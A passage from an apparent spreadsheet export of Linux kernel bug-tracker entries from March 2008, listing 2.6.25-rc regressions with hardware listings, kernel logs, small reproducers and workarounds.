INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0, IRQ 19 I/O ports at e800 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) (prog-if 00 [UHCI]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0, IRQ 21 I/O ports at e480 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) (prog-if 00 [UHCI]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0, IRQ 16 I/O ports at e400 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) (prog-if 20 [EHCI]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0, IRQ 18 Memory at ffe37c00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) (prog-if 01 [Subtractive decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=03, subordinate=04, sec-latency=32 I/O behind bridge: 0000c000-0000dfff Memory behind bridge: ff300000-ffbfffff Prefetchable memory behind bridge: 00000000bdf00000-00000000bfefffff Capabilities: [50] Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) (prog-if 80 [Master]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 19 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at ffa0 [size=16] Capabilities: [70] Power Management version 2 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: medium devsel, IRQ 5 I/O ports at 0400 [size=32] 01:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02) Subsystem: Intel Corporation Unknown device 1001 Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at ff2ff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [c8] Power Management version 2 Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Capabilities: [e0] Express Legacy Endpoint IRQ 0 03:04.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 64, IRQ 16 I/O ports at d800 [size=256] Memory at ffbfec00 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 03:06.0 FireWire (IEEE 1394): O2 Micro, Inc. Firewire (IEEE 1394) (rev 02) (prog-if 10 [OHCI]) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: bus master, medium devsel, latency 64, IRQ 19 Memory at ff300000 (32-bit, non-prefetchable) [size=4K] Memory at ffbfe000 (32-bit, non-prefetchable) [size=2K] Capabilities: [60] Power Management version 2 03:06.2 Generic system peripheral [0805]: O2 Micro, Inc. Integrated MMC/SD Controller (rev 01) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: slow devsel, IRQ 5 Memory at ffbfe800 (32-bit, non-prefetchable) [size=256] Capabilities: [a0] Power Management version 2 03:06.3 Mass storage controller: O2 Micro, Inc. Integrated MS/xD Controller (rev 01) Subsystem: TWINHEAD INTERNATIONAL Corp Unknown device a003 Flags: slow devsel, IRQ 5 Memory at ffbff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [a0] Power Management version 2</t>
  </si>
  <si>
    <t>intel mtrr fixups apparently broke display and e1000 probe</t>
  </si>
  <si>
    <t>2008-03-12 08:37 UTC</t>
  </si>
  <si>
    <t>Stephen Gran</t>
  </si>
  <si>
    <t>2008-03-21 10:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.24.3 Earliest failing kernel version:2.6.25-rc3 Distribution:Debian Hardware Environment: 00:00.0 Host bridge: Intel Corporation 82P965/G965 Memory Controller Hub (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82G965 Integrated Graphics Controller (rev 02) 00:03.0 Communication controller: Intel Corporation 82P965/G965 HECI Controller (rev 02) 00:19.0 Ethernet controller: Intel Corporation 82566DC Gigabit Network Connection (rev 02) 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Contoller #4 (rev 02) 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 02) 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 02) 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 2 (rev 02) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 02) 00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 02) 00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev f2) 00:1f.0 ISA bridge: Intel Corporation 82801HB/HR (ICH8/R) LPC Interface Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801H (ICH8 Family) 4 port SATA IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 02) 00:1f.5 IDE interface: Intel Corporation 82801H (ICH8 Family) 2 port SATA IDE Controller (rev 02) 02:00.0 IDE interface: Marvell Technology Group Ltd. 88SE6101 single-port PATA133 interface (rev b1) 06:03.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) Software Environment:Debian unstable Problem Description: Since the introduction of the mtrr fixup patches http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=99fc8d424bc5d803fe92cad56c068fe64e73747a my machine no longer is able to have a working display or network card. The e1000 probe fails with error 5. The display is less helpful - no error is reported, but I can't actually see anything on the screen. As this machine doesn't have working serial on it at the moment, my steps are reboot, wait, reboot again to old kernel, and read the kernel log. Not so easy to debug, sorry :) mtrr maps: HIGHMEM4G=yes: BIOS-e820: 0000000000000000 - 000000000008f000 (usable) BIOS-e820: 000000000008f000 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 00000000cf561000 (usable) BIOS-e820: 00000000cf561000 - 00000000cf56e000 (reserved) BIOS-e820: 00000000cf56e000 - 00000000cf612000 (usable) BIOS-e820: 00000000cf612000 - 00000000cf6e9000 (ACPI NVS) BIOS-e820: 00000000cf6e9000 - 00000000cf6ec000 (usable) BIOS-e820: 00000000cf6ec000 - 00000000cf6f1000 (ACPI data) BIOS-e820: 00000000cf6f1000 - 00000000cf6f2000 (usable) BIOS-e820: 00000000cf6f2000 - 00000000cf6ff000 (ACPI data) BIOS-e820: 00000000cf6ff000 - 00000000cf700000 (usable) BIOS-e820: 00000000cf700000 - 00000000d0000000 (reserved) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) BIOS-e820: 0000000100000000 - 000000012c000000 (usable) HIGHMEM64G=yes: BIOS-e820: 0000000000000000 - 000000000008f000 (usable) BIOS-e820: 000000000008f000 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 00000000cf561000 (usable) BIOS-e820: 00000000cf561000 - 00000000cf56e000 (reserved) BIOS-e820: 00000000cf56e000 - 00000000cf612000 (usable) BIOS-e820: 00000000cf612000 - 00000000cf6e9000 (ACPI NVS) BIOS-e820: 00000000cf6e9000 - 00000000cf6ec000 (usable) BIOS-e820: 00000000cf6ec000 - 00000000cf6f1000 (ACPI data) BIOS-e820: 00000000cf6f1000 - 00000000cf6f2000 (usable) BIOS-e820: 00000000cf6f2000 - 00000000cf6ff000 (ACPI data) BIOS-e820: 00000000cf6ff000 - 00000000cf700000 (usable) BIOS-e820: 00000000cf700000 - 00000000d0000000 (reserved) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) BIOS-e820: 0000000100000000 - 000000012c000000 (usable) modified: 0000000000000000 - 000000000008f000 (usable) modified: 000000000008f000 - 00000000000a0000 (reserved) modified: 00000000000e0000 - 0000000000100000 (reserved) modified: 0000000000100000 - 00000000cf561000 (usable) modified: 00000000cf561000 - 00000000cf56e000 (reserved) modified: 00000000cf56e000 - 00000000cf612000 (usable) modified: 00000000cf612000 - 00000000cf6e9000 (ACPI NVS) modified: 00000000cf6e9000 - 00000000cf6ec000 (usable) modified: 00000000cf6ec000 - 00000000cf6f1000 (ACPI data) modified: 00000000cf6f1000 - 00000000cf6f2000 (usable) modified: 00000000cf6f2000 - 00000000cf6ff000 (ACPI data) modified: 00000000cf6ff000 - 00000000cf700000 (usable) modified: 00000000cf700000 - 000000012c000000 (reserved) Steps to reproduce:</t>
  </si>
  <si>
    <t>pciehp hang on hp ia64 rx6600</t>
  </si>
  <si>
    <t>2008-03-12 16:08 UTC</t>
  </si>
  <si>
    <t>2008-03-18 09:18 UTC</t>
  </si>
  <si>
    <t>Submitter : Alex Chiang &lt;achiang@hp.com&gt; Date : 2008-03-12 00:47 References : http://lkml.org/lkml/2008/3/12/31 Handled-By : Mark Lord &lt;mlord@pobox.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>noloop is missing in /sys/module/i8042/parameters</t>
  </si>
  <si>
    <t>2008-03-12 17:02 UTC</t>
  </si>
  <si>
    <t>Franklin Piat</t>
  </si>
  <si>
    <t>2008-06-23 08:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: ? Earliest failing kernel version: 2.6.24 Distribution: Debian Unstable Hardware Environment: n.a Software Environment: n.a Problem Description: Some of the i8042 modules parameters aren't listed in sysfs' /sys/module/i8042/parameters/ ("noloop", among others ) BTW, i8042's "noloop" is also missing in Documentation/kernel-parameters.txt</t>
  </si>
  <si>
    <t>netconsole still hangs</t>
  </si>
  <si>
    <t>2.6.25-rc5-git2</t>
  </si>
  <si>
    <t>2008-03-13 09:25 UTC</t>
  </si>
  <si>
    <t>2008-03-21 13:16 UTC</t>
  </si>
  <si>
    <t>Subject : netconsole still hangs Submitter : Andrew Morton &lt;akpm@linux-foundation.org&gt; Date : 2008-03-12 23:14 References : http://marc.info/?t=120536379200004&amp;r=1&amp;w=2 Handled-By : David Miller &lt;davem@davemloft.net&gt; Handled-By : Stephen Hemminger &lt;shemminger@linux-foundation.org&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Robert de Rooy</t>
  </si>
  <si>
    <t>rm command hangs</t>
  </si>
  <si>
    <t>2008-03-14 05:47 UTC</t>
  </si>
  <si>
    <t>2008-03-28 15:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25-rc5-git4 Distribution: Debia/Sid Hardware Environment: AUS A8V, Athlon 64 x2 4200+ Software Environment: raid1, cryptsetup (luks), lvm2, xfs Problem Description: "sometimes" a rm command stalls. The files are deleted but the xterm or console are frozen. A strace on the pid stalls as well without any message after the "attached to pid" message. Then, it is impossible to sync the filestem (command hangs) or to umount the device (busy). I've never seen this problem with 2.6.24 (this doesnt mean it doesnt exist). Maybe it was not existing with 2.6.25-rc2 but I've not used it too much. I have it once or twice a day on 2.6.25-rc5. The rm process is not killeable. I need to reboot to get rid of it. The filsystem, after playing the journals doesnt appear to be corrupted (xfs_check dosnt report any error). Steps to reproduce: rm -rf /xxx/xxxx (I got it mostly cleaning a tree via a script after building a debian package on my machine). The filesystem is an xfs filesystem. It is built on a raid1, encrypted with cryptsetup using luks and it is a lvm2 logical volume over this raid1.</t>
  </si>
  <si>
    <t>lm_sensors causes ACPI errors and critical thermal shutdown</t>
  </si>
  <si>
    <t>2008-03-14 15:13 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.23.15 Also failing: 2.6.24.3, 2.6.25-rc5 Distribution: Fedora 8 https://bugzilla.redhat.com/show_bug.cgi?id=437466 Mar 14 13:22:20 sysop kernel: ACPI Exception (exoparg2-0442): AE_AML_PACKAGE_LIMIT, Index (0FFFFFFFF) is beyond end of object [20070126] Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.C247] (Node f781c2d0), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.C246] (Node f781c2b8), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.TZ2_._TMP] (Node f781c858), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI Exception (exoparg2-0442): AE_AML_PACKAGE_LIMIT, Index (0FFFFFFFF) is beyond end of object [20070126] Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.C247] (Node f781c2d0), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.C246] (Node f781c2b8), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI Error (psparse-0537): Method parse/execution failed [\_TZ_.TZ2_._TMP] (Node f781c858), AE_AML_PACKAGE_LIMIT Mar 14 13:22:20 sysop kernel: ACPI: Critical trip point Mar 14 13:22:20 sysop kernel: Critical temperature reached (1024 C), shutting down. Mar 14 13:22:20 sysop kernel: ACPI: Critical trip point Mar 14 13:22:20 sysop kernel: Critical temperature reached (1024 C), shutting down. Mar 14 13:22:20 sysop kernel: ACPI: Critical trip point Mar 14 13:22:20 sysop kernel: Critical temperature reached (1024 C), shutting down.</t>
  </si>
  <si>
    <t>in after successful ioperm() results in SEGV after kvm use</t>
  </si>
  <si>
    <t>2008-03-14 18:48 UTC</t>
  </si>
  <si>
    <t>2008-03-26 06:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: N/A Earliest failing kernel version: 2.6.24 Distribution: Ubuntu, but tested with mainline Hardware Environment: intel mobo, Intel(R) Core(TM)2 Quad CPU Q6600@2.40GHz Software Environment: kvm 62 (x86_64) Problem Description: After a successful ioperm() call, otherwise valid "in" instructions will segv if a kvm VM has started. Steps to reproduce: 1) run attached reproducer prior to starting a kvm VM, results are: # ./ioperm getting 0x3b4-0x3df permission... fetching 0x3cc... ok: 1 2) start a kvm VM (bug exists only after actually starting a guest VM) 3) run reproducer, which now fails: # ./ioperm getting 0x3b4-0x3df permission... fetching 0x3cc... Segmentation fault (core dumped) Note that it does not always fail. Running within gdb seems to reduce the chances that it will fail. But when it does, it is clearly the "in" that is failing: Program received signal SIGSEGV, Segmentation fault. 0x00000000004006e4 in inb () (gdb) x/1i $pc 0x4006e4 &lt;inb+12&gt;: in (%dx),%al (gdb) info reg rdx rdx 0x3cc 972 I have had the sense that running the CPUs at full load (niced) increases the chance for failure.</t>
  </si>
  <si>
    <t>Wrong comments in include/asm-86/sync_bitops.h</t>
  </si>
  <si>
    <t>2.6.25-rc5-git4</t>
  </si>
  <si>
    <t>2008-03-14 23:19 UTC</t>
  </si>
  <si>
    <t>2008-03-21 10:40 UTC</t>
  </si>
  <si>
    <t>Problem Description: the following comments are wrong: * Note: there are no guarantees that this function will not be reordered * on non-x86 architectures, so if you are writing portable code, * make sure not to rely on its reordering guarantees. It may be * reordered on other architectures than x86. * It may be reordered on other architectures than x86. * It can be reorderdered on other architectures other than x86.</t>
  </si>
  <si>
    <t>xpad - Xbox360 Controller does not work, led related issue</t>
  </si>
  <si>
    <t>2008-03-15 07:27 UTC</t>
  </si>
  <si>
    <t>MG</t>
  </si>
  <si>
    <t>2008-07-16 08:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: http://www.fujitsu-siemens.com/Resources/59/562938810.pdf Software Environment: jstest Problem Description: I have an official Microsoft Xbox360 Controller (wired). When I plug it in it is recognized by the driver: dmesg: usb 3-2: new full speed USB device using uhci_hcd and address 3 usb 3-2: configuration #1 chosen from 1 choice Registered led device: xpad0 input: Microsoft X-Box 360 pad as /class/input/input7 usbcore: registered new interface driver xpad drivers/input/joystick/xpad.c: X-Box pad driver:v0.0.6 But it does not work, jstest gives the following initial output, but nothing changes when I press any buttons: jstest /dev/input/js0: Driver version is 2.1.0. Joystick (Microsoft X-Box 360 pad) has 8 axes (X, Y, Z, Rx, Ry, Rz, Hat0X, Hat0Y) and 13 buttons (BtnX, BtnY, BtnZ, BtnTL, BtnTR, BtnTL2, BtnTR2, BtnSelect, BtnThumbR, ?, ?, ?, BackBtn). Testing ... (interrupt to exit) Axes: 0: 0 1: 0 2:-32767 3: 0 4: 0 5:-32767 6: 0 7: 0 Buttons: 0:off 1:off 2:off 3:off 4:off 5:off 6:off 7:off 8:off 9:off 10:off 11:off 12:off Workaround: If I comment out the line "usb_submit_urb(xpad-&gt;irq_out, GFP_KERNEL);" inside of "xpad_send_led_command" in xpad.c the controller works fine but the leds are blinking all the time and drive me crazy.</t>
  </si>
  <si>
    <t>make menuconfig help actualization needed</t>
  </si>
  <si>
    <t>2008-03-15 08:34 UTC</t>
  </si>
  <si>
    <t>2008-03-15 10:37 UTC</t>
  </si>
  <si>
    <t>Alessandro Zummo</t>
  </si>
  <si>
    <t>Distribution: gentoo amd64 Problem is present at least when using 2.6.23-gentoo-r9 the help of Device Drivers ---&gt; &lt; &gt; Real Time Clock says that "This driver can also be built as a module. If so, the module will be called rtc-class." I compiled this option as a module, but I have no module named rtc-class, so maybe at least this one help page needs to be actualised. Thanks.</t>
  </si>
  <si>
    <t>/sys/class/hwmon/hwmon0 is missing a device link</t>
  </si>
  <si>
    <t>2008-03-16 04:56 UTC</t>
  </si>
  <si>
    <t>2008-03-19 13:12 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-rc5-git3 Earliest failing kernel version: 2.6.25-rc5-git4 Distribution: Debian/Sid Hardware Environment: ASUS A8V, Atnlon 64 x2 4200+ Software Environment: Problem Description: "sensors" command returns "sensors_init: Kernel interface error" while the correct modules are loaded Steps to reproduce: boot the system, run snesors or libsensors related applications With git3, I've the following tree: /sys/class/hwmon/hwmon0/ |-- device -&gt; ../../../devices/pci0000:00/0000:00:18.3 |-- power | `-- wakeup |-- subsystem -&gt; ../../hwmon `-- uevent with git4, I get: /sys/class/hwmon/hwmon0/ |-- name |-- power | `-- wakeup |-- subsystem -&gt; ../../hwmon `-- ueven "sensors" complains about the missing device link: &lt;snip&gt; open("/sys/class/hwmon", O_RDONLY|O_NONBLOCK|O_DIRECTORY|0x80000) = 3 fstat(3, {st_mode=S_IFDIR|0755, st_size=0, ...}) = 0 getdents(3, /* 5 entries */, 4096) = 144 readlink("/sys/class/hwmon/hwmon0/device", 0x7fffe7b98f60, 254) = -1 ENOENT (No such file or directory) close(3) = 0 write(2, "sensors_init: Kernel interface e"..., 37sensors_init: Kernel interface error ) = 37 &lt;snip/&gt;</t>
  </si>
  <si>
    <t>[PATCH] i810fb: Fix console switch regression</t>
  </si>
  <si>
    <t>commit eaa0ff15c30dc9799eb4d12660edb73aeb6d32c5</t>
  </si>
  <si>
    <t>2008-03-16 13:34 UTC</t>
  </si>
  <si>
    <t>2008-03-20 02:37 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] i810fb: Fix console switch regression Submitter : Stefan Bauer &lt;stefan.bauer@cs.tu-chemnitz.de&gt; Date : 2008-03-16 19:42 References : http://lkml.org/lkml/2008/3/16/84 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dm raid1: bitops bug</t>
  </si>
  <si>
    <t>commit 8f0205b798f926e2745de5fdebf0a8605c621de6</t>
  </si>
  <si>
    <t>2008-03-17 13:25 UTC</t>
  </si>
  <si>
    <t>2008-03-28 15:21 UTC</t>
  </si>
  <si>
    <t>Subject : Re: + dm-raid1-bitops-bug.patch added to -mm tree Submitter : Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt; Date : 2008-03-17 16:45 References : http://lkml.org/lkml/2008/3/17/174 Handled-By : Alasdair G Kergon &lt;agk@redhat.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline</t>
  </si>
  <si>
    <t>acpi_drivers.h: fix dock dummy functions</t>
  </si>
  <si>
    <t>2.6.25-rc6-git</t>
  </si>
  <si>
    <t>2008-03-17 13:35 UTC</t>
  </si>
  <si>
    <t>2008-03-18 09:21 UTC</t>
  </si>
  <si>
    <t>Subject : acpi_drivers.h: fix dock dummy functions Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; References : http://lkml.org/lkml/2008/3/17/264 Caused-By : Tejun Heo &lt;htejun@gmail.com&gt; commit 233f112042d0b50170212dbff99c3b34b8773cd3 Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2008/3/17/296 ("Caused-By" refers to the new build error, the bug itself is older)</t>
  </si>
  <si>
    <t>Sun GEM (PCI) - network device doesn't work</t>
  </si>
  <si>
    <t>2008-03-17 14:25 UTC</t>
  </si>
  <si>
    <t>2008-11-20 09:00 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.9 Earliest failing kernel version: 2.6.23 Distribution: Gentoo Hardware Environment: Sparc64 (Sun Blade 100) Software Environment: Problem Description: I have two nearly identical Sun Blade 100 systems. Up to and including kernel version 2.6.22.9, both were working fine. However, with the 2.6.23- and 2.6.24- series I cannot get the Sun GEM network device on one of the two Blades to work. The other one strangely does not have this problem at all. The network device detects fine and the sungem module loads without problems. Mii-diag reports that a 100FDX connection exists and there is link beat. However, packets are neither being sent nor received, all counters in ifconfig remain at zero. Attempts to use the network eventually result in the following message in dmesg: eth0: Sun GEM (PCI) 10/100/1000BaseT Ethernet 00:03:ba:08:61:7c eth0: Found Generic MII PHY eth0: Link is up at 100 Mbps, full-duplex. eth0: Link is up at 100 Mbps, full-duplex. eth0: Pause is disabled NETDEV WATCHDOG: eth0: transmit timed out eth0: transmit timed out, resetting eth0: TX_STATE[003ffc05:00000001:0000001f] eth0: RX_STATE[0100c805:00000001:00000021] eth0: Link is up at 100 Mbps, full-duplex. eth0: Pause is disabled The difference between the non-working system and the working one are as follows: - The non-working system has more memory (1G opposed to 512M) - A dual SCSI controller is present in this system. Connected to it are two external 72G disks and an Exabyte Mammoth tapedrive. 01:02.0 SCSI storage controller: LSI Logic / Symbios Logic 53c875 (rev 14) 01:02.1 SCSI storage controller: LSI Logic / Symbios Logic 53c875 (rev 14) - The following kernel modules are loaded on this system and not on the working one: sym53c8xx, sd_mod, st, nfsd, md_mod and raid1 plus of course their respective dependencies. The problem is exactly the same with both Gentoo-patched kernels and vanilla kernels, that's why I am reporting it here. Steps to reproduce: Just boot an affected kernel and try to use eth0 in any way.</t>
  </si>
  <si>
    <t>SATA/ATA to USB bridge JM20337+Driver 'sd' needs updating - please use bus_type methods</t>
  </si>
  <si>
    <t>2008-03-17 15:02 UTC</t>
  </si>
  <si>
    <t>David Voit</t>
  </si>
  <si>
    <t>2010-01-19 17:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora 8 (ppc) Hardware Environment: ibook G4 Software Environment: Problem Description: The bridge is not detected only a /dev/sda is created, witch can't be mounted or accesed. lsusb: Bus 001 Device 004: ID 152d:2338 JMicron Technology Corp. / JMicron USA Technology Corp. JM20337 Hi-Speed USB to SATA &amp; PATA Combo Bridge dmesg: Initializing USB Mass Storage driver... scsi0 : SCSI emulation for USB Mass Storage devices usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usb-storage: device found at 4 usb-storage: waiting for device to settle before scanning usb-storage: device scan complete scsi 0:0:0:0: Direct-Access PQ: 0 ANSI: 2 CCS scsi 0:0:0:0: Attached scsi generic sg0 type 0 Driver 'sd' needs updating - please use bus_type methods sd 0:0:0:0: [sda] Attached SCSI disk Steps to reproduce: Just attach the device</t>
  </si>
  <si>
    <t>directory ctime not updated by rename</t>
  </si>
  <si>
    <t>2008-03-18 09:11 UTC</t>
  </si>
  <si>
    <t>Lasse Kliemann</t>
  </si>
  <si>
    <t>2009-01-17 19:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: LFS Hardware Environment: 32bit x86 Software Environment: Problem Description: Renaming a file into a directory so that an already existing file is overwritten, will not update the ctime on the directory. This seems to be the reason for certain failures with incremental backups (e.g., with star). Steps to reproduce: Run the following commands and watch the output from stat. Upon the second run of rename, the ctime is not updated on the directory sub. rm -fr sub new &amp;&amp; mkdir sub &amp;&amp; stat sub &amp;&amp; sleep 2 &amp;&amp; echo running rename &amp;&amp; ./rename a &amp;&amp; stat sub &amp;&amp; sleep 2 &amp;&amp; echo running rename again &amp;&amp; ./rename b &amp;&amp; stat sub Here is rename.c: #include &lt;unistd.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/stat.h&gt; int main(int argc, char** argv) { int fd; fd = open("new", O_WRONLY | O_NDELAY | O_TRUNC | O_CREAT, 0644); write(fd, argv[1], 1); close(fd); rename("new", "sub/x"); return 0; }</t>
  </si>
  <si>
    <t>suspend slow in 2.6.25-rc6</t>
  </si>
  <si>
    <t>2.6.25-rc6</t>
  </si>
  <si>
    <t>2008-03-18 17:25 UTC</t>
  </si>
  <si>
    <t>2008-10-17 14:40 UTC</t>
  </si>
  <si>
    <t>Subject : suspend slow in 2.6.25-rc6 Submitter : Pavel Machek &lt;pavel@suse.cz&gt; Date : 2008-03-18 References : http://lkml.org/lkml/2008/3/18/145 Handled-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression: cannot run Postfix sendmail command as non-root</t>
  </si>
  <si>
    <t>2008-03-19 15:55 UTC</t>
  </si>
  <si>
    <t>2008-03-21 13:14 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-rc5-mm1] regression: cannot run Postfix sendmail command as non-root Submitter : Tilman Schmidt &lt;tilman@imap.cc&gt; Date : 2008-03-19 17:52 References : http://marc.info/?l=linux-kernel&amp;m=120596507521149&amp;w=4 Handled-By : "Benjamin Thery" &lt;ben.thery@gmail.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernell crash if used "agp=off"</t>
  </si>
  <si>
    <t>2.6.24 - 2.6.25-rc6</t>
  </si>
  <si>
    <t>2008-03-20 03:03 UTC</t>
  </si>
  <si>
    <t>2008-09-08 21:41 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: ubuntu hardy 8.04 Hardware Environment: ASUS P5LD2-VM = ICH7 + i945G + 2 GB RAM + Pentium D Software Environment: Problem Description: If drm and agp modules was compliled in kernel, kernel optio agp=off will couse crash. Steps to reproduce: 1. compile a kernel with agp_intel and drm_i915 2. reboot and set kernel option agp=off</t>
  </si>
  <si>
    <t>rfkill continous console output</t>
  </si>
  <si>
    <t>2008-03-21 02:01 UTC</t>
  </si>
  <si>
    <t>2008-03-27 18:06 UTC</t>
  </si>
  <si>
    <t>Hey guys, For as long as I can remember since rt2500pci was my wireless driver, rfkill inserts data once per second into my keyboard stream. Normally, X ignores these data and the problem simply manifests itself as keyboard repetition being stopped once per second. I think there may have been some change between 2.6.24 and 2.6.25-rc5 which prevents me logging in on a console. Now, during boot, my console is spammed with ^@ (i.e. \0) once per second and I can't log in on the console (because my password is interspersed with ^@!). X still works. If I remove the rt2500pci and dependant modules, the output stops. If I echo 0 &gt; /sys/class/rfkill/rfkill0/state, the output stops. Otherwise, 0x60 (96) bytes of this output appear every second: bruce@moon:~$ sudo od -t c -t u1 /dev/input/event5 0000000 &gt; t 343 G \0 \0 \0 \0 232 \t \0 \0 \0 \0 \0 \0 62 116 227 71 0 0 0 0 154 9 0 0 0 0 0 0 0000020 001 \0 356 \0 001 \0 \0 \0 &gt; t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 62 116 227 71 0 0 0 0 0000040 244 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 164 9 0 0 0 0 0 0 1 0 238 0 0 0 0 